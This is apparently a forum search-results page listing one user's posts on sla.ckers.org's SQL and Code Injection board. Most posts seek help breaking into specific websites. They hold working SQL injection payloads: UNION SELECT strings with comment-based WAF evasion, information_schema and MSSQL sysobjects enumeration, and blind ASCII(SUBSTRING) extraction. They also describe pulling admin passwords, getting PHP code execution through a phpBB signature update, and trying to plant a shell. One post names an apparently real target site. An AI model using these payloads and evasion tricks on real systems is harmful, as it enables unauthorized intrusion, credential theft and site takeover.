Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 51
1 year ago
the_storm
HelLo guys I would like to bypass this filter The word "order" I tried /*!order*/. Didnt work And different variations of capital and small letters but it didnt work ....any help with that ?bb
Forum: SQL and Code Injection
2 years ago
the_storm
Hello Gus I have some an application that is vulnerable to sql injecion ... For example, if that was the link http://www.test.com/audioalbumdetails/58+order+by+1/* I get this error msg SELECT id,name,content,time FROM nesote_music_comments WHERE status=1 and service_type='music' and service_id='58 order by 1' ORDER BY time desc LIMIT -5,5 ; MySQL Error: You have an error in your SQL s
Forum: SQL and Code Injection
2 years ago
the_storm
This maybe is one reason you might try another web browser, or maybe there is some filteration in the website against XSS attacks :)
Forum: SQL and Code Injection
2 years ago
the_storm
I dont think it is vulnerable to SQLi but you should try XSS!! I think it is vulnerable !
Forum: SQL and Code Injection
2 years ago
the_storm
Reiners Wrote: ------------------------------------------------------- > obviously the GET parameter "root" is split on > "_". > so "shared_0" becomes "WHERE file_root_type = > 'shared' AND file_root_ID = 0". > > if you put "and 1=2" the query may return nothing, > but the application can still decide to display >
Forum: SQL and Code Injection
2 years ago
the_storm
Hello guys, I have a sql injection in a website, but it is not completely working. Let's say this is the the url "http://site/script//viewfile.php?path=monument-valley/bus-stop-ahead.jpg&viewtype=image&root=shared_0" >> the site is working correctly If I add a single quote to the end of the url I get an error "http://127.0.1.1/b2evolution/blogs/htsrv/viewfile.php
Forum: SQL and Code Injection
2 years ago
the_storm
Hey guys I have a sql injection in a website but the combination between union+select is filtered. If i wrote select only I get reply If I wrote union only I get reply but If I wrote union+select I hot forbidden .. I have tried to bypass the filtration by using the comments /*!UNION*/ and I failed .. is there any other way to bypass this filtration ? Thank you!
Forum: SQL and Code Injection
2 years ago
the_storm
any help ??
Forum: SQL and Code Injection
2 years ago
the_storm
Hi guys, I have a SQL injection in a site and IT has 94 columns I want to read a specific range of the tables how can I do that ...?? I have tried to use limit x,y but it didn't work i.e http://www.site.com/index.php?option=com_library&id=-16%27+/*!UNION*/+select+1,2,/*!%28TABLE_NAME%29*/,4+/*!FROM*/+/*!INfoRMAtION_SCHEMA.TABLES*/+/*!Where*/+/*!TABLE_SCHEMA=database%28%29*/+limit%201,3-
Forum: SQL and Code Injection
3 years ago
the_storm
_antivirus_ Wrote: ------------------------------------------------------- > unhex(hex(password)) I have tried it but still the same problem
Forum: SQL and Code Injection
3 years ago
the_storm
Hey guys .. I have a website which has a SQL injection in it .. but when I try to get the username and password I can get the username put the field of the password is always empty .... and this can't be true .. There must be a password .. and the site doesn't give me any errors and When I used Havij (although I dont prefer using programs I love hands on ) I got this msg Turning on 'bypass illegal
Forum: SQL and Code Injection
3 years ago
the_storm
I use this method to get the column name http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000
Forum: SQL and Code Injection
3 years ago
the_storm
lightos Wrote: ------------------------------------------------------- > To concat in MSSQL simply use +, so fldUsername + > 0x3A + fldPassword and don't forget to URL Encode > the plus sign. Thank you dude it is working :) I have another question bro now look at this url http://www.site.com/shopping/page.asp?id=30 and (SELECT(fldAuto) from tbluser)>1 this gives me
Forum: SQL and Code Injection
3 years ago
the_storm
Hey guys .. there is a website that has a blind mssql .. I used this way to get the different tables http://www.site.com/page.asp?id=30 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 9 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)>97 and I also get the columns name ... now I have th
Forum: SQL and Code Injection
3 years ago
the_storm
hi thanggiangho ..... could u explain the code why did u use 0xAAAA
Forum: SQL and Code Injection
3 years ago
the_storm
thanggiangho woow..... could u teach uw how did u do it .. ? ?
Forum: SQL and Code Injection
3 years ago
the_storm
I have tried the /*!Union*/+/*!SELECT*/ .. I have tried also the double encoding but still I cant bypass it...
Forum: SQL and Code Injection
3 years ago
the_storm
http://cleopatra-sy.com/index.php?content=more_product&id=17 here is the link ......... I have tried a lot to bypass it but I couldn't.... any help...?
Forum: SQL and Code Injection
3 years ago
the_storm
lightos what do u mean by "(double) URL encoding " I have searched the net for url encoder but when I encode my url it still contains the word select for example here is the normal url " /**//*!UNION*//**//*!SeLeCT*//**/1,2,3,4,5,6,7,8-- - the encoded one is "%2f**%2f%2f*!UNION*%2f%2f**%2f%2f*!SeLeCT*%2f%2f**%2f1%2c2%2c3%2c4%2c5%2c6%2c7%2c8--+-" if u notice that the wo
Forum: SQL and Code Injection
3 years ago
the_storm
Hi guys I have a website that forbids using the word Select in any from ... weather it is upper case or lower case... http://www.site.com/index.php?content=product_info&id=-35/**//*!UNION*//**//*!SeLeCT*//**/1,2,3,4,5,6,7,8--%20- I used this link and still I got error ... how can I bypass this filtration?? any ideas?
Forum: SQL and Code Injection
3 years ago
the_storm
m1cr0n you are awesome .... it works :) :) but I wanna understand what it means CONVERT(version() USING latin1) ??
Forum: SQL and Code Injection
3 years ago
the_storm
Hi guys :) ... how r u .. ? I hope you are okay .... Guys I do have a website in which there is a sql injection I tested the website by http://www.thesite.com/index.php?do=show_foundations.php&id=39' and the I got the columns http://www.thesite.com/index.php?do=show_foundations.php&id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11--%20- and I could see the number of the unhidden colum
Forum: SQL and Code Injection
3 years ago
the_storm
Reiners .. "I can execute php code" What do u mean by that? yes I can execute php, I can read files. I can't write files because when I write file_put_contents("shell.php", "phpshellcode"); the server gives me error that I can't use double or single quote. I can only read file bye this file_get_contents($_GET); so I avoid using quotes. here is php version PHP/5.3
Forum: SQL and Code Injection
3 years ago
the_storm
no I can't allow .php as extension and I can't allow layouts to allow php...
Forum: SQL and Code Injection
3 years ago
the_storm
Hey guys, I have a username and password of the admin in phpbb Froum. I googled about how to upload shell via phpbb control panel and I found the way that about restoring the database and update the profile here is the code. UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0' , user_sig='phpbb:cURL($_GET)' WHERE user_id=19770; I think most of u already know it. Now, the problem
Forum: SQL and Code Injection
3 years ago
the_storm
thank you Kyo Done :) and Thank you Reiners too :) Finally, Thank you Sla.ckers.org :)
Forum: SQL and Code Injection
3 years ago
the_storm
could u elaborate more bro..? what do u want exactly?
Forum: SQL and Code Injection
3 years ago
the_storm
Doesn't work dude, any way thank you Bro :)
Forum: SQL and Code Injection
3 years ago
the_storm
couldn't use it... Do u mind explain it a little ?
Forum: SQL and Code Injection
3 years ago
the_storm
check this out: Software: Microsoft-IIS/6.0. PHP/4.4.7 uname -a: Windows NT WINWEB04 5.2 build 3790 Safe-mode: ON (secure) My main goal is to get the safe mode of
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2